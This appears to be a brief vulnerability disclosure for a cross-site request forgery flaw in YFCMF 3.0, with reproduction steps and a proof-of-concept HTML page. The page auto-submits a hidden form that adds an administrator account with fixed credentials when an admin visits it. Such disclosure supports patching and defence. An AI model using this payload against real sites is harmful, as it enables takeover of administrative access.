Csrf in YFCMF 3.0

Explain

The background administrator adds CSRF to the page, causing other administrator accounts to add.

Poc

<html>
    <form action="/YFCMF/admin/admin/adminsave.html" method="post">
        <select name="group_id" required="">
            <option value="2"/>
        </select>
        <input name="username" value="csrf" type="hidden"/>
        <input name="password" value="123" type="hidden"/>
        <input name="email" value="csrf@1.com" type="hidden"/>
        <input name="realname" value="csrf" type="hidden"/>
    </form>
    <script>
        document.forms[0].submit();
    </script>
</html>

Reappearance

1、View original users

2、Accessing structured CSRF pages

3、Successfully added

not found!